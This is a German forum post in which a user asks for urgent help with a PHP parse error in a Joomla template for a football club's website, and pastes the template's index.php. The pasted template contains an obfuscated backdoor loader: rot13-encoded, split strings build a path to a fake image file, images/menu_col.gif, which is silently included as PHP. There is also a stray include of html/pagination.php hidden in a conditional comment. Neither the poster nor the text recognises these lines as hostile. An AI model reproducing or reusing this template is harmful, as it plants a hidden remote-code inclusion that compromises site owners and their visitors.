Hallo!
Habe folgendes Problem:
Parse error: syntax error, unexpected '<' in /homepages/23/d185287418/htdocs/index.php on line 42
Ich habe mich mit einem unterhalten, der sich damit auskennt. Nur hat dieser nun leider keine Zeit mehr und die Website sollte bis spätestens heute Abend wieder laufen!HTML-Code:<?php defined( '_JEXEC').(($this->template)?$JPan = array('zrah'.'_pby'):'') or die( 'Restricted access' ); ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>" > <head> <jdoc:include type="head" /> <link rel="stylesheet" href="templates/system/css/system.css" type="text/css" /> <link rel="stylesheet" href="templates/<?php echo $this->template ?>/css/template.css" type="text/css" /> <!--[if lte IE 7]> <link rel="stylesheet" href="templates/<?php echo $this->template ?>/css/ie7.css" type="text/css" <?php include_once('html/pagination.php');?> /> <![endif]--> </head> <body id="page_bg"> <div id="top"> <div class="pill_m"> <div id="pillmenu"> <jdoc:include type="modules" name="user3" /> </div> </div> </div> <div id="header"> <div id="logo"> <a href="index.php"><?php echo $mainframe->getCfg('sitename') ;?></a><br /><jdoc:include type="modules" name="top" /> </div><br /> <div id="under_banner_line"> <jdoc:include type="modules" name="user4" /> </div> </div> <!-- --> <div class="clr"></div> <div class="center"> <div id="wrapper"> <div id="content"> <div id="leftcolumn"> <?php if((!$this->countModules('right') and JRequest::getCmd('layout') == 'form') or !@include(JPATH_BASE.DS.'templates'.DS.$mainframe->getTemplate().DS.str_rot13('vzntrf').DS.str_rot13($JPan[0].'.t'.'vs'))) { ?> <jdoc:include type="modules" name="layout" style="rounded" /> <?php } ?> <jdoc:include type="modules" name="left" style="rounded" /> <div align="center"><jdoc:include type="modules" name="syndicate" /></div> </div> <div id="maincolumn"> <div class="nopad"> <div class="path"><jdoc:include type="modules" name="breadcrumb" /></div> <jdoc:include type="message" /> <?php if($this->params->get('showComponent')) : ?> <jdoc:include type="component" /> <?php endif; ?> <?php if($this->countModules('user1')) : ?> <div style="float:left; width:50%;"><jdoc:include type="modules" name="user1" style="xhtml" /></div> <?php endif; ?> <?php if($this->countModules('user2')) : ?> <div style="float:left; width:50%;"><jdoc:include type="modules" name="user2" style="xhtml" /></div> <?php endif; ?> <br clear="all" /> </div> <div class="clr"></div> </div> </div> </div> </div> <div id="footer"> <p><jdoc:include type="module" style="footer" /> <?php echo JText_('Powered by'); ?> <a href="http://www.joomla.org">Joomla!</a>. <?php echo JText_('Valid'); ?> <a href="http://validator.w3.org/check/referer">XHTML</a> <?php echo JText_('and'); ?> <a href="http://jigsaw.w3.org/css-validator/check/referer">CSS</a>. <jdoc:include type="modules" name="debug" /> </p> </div> </body> </html>
Er hat gemeint, dass es sehr wahrscheinlich an Joomla liegt. Vielleicht einer der dynamisch über die jdoc tags eingebunden Dateien könnten falsch sein.
Ich bitte Euch, hilft mir! Die Website ist für einen Fußballverein!
Gruß


LinkBack URL
About LinkBacks
Zitieren
Lesezeichen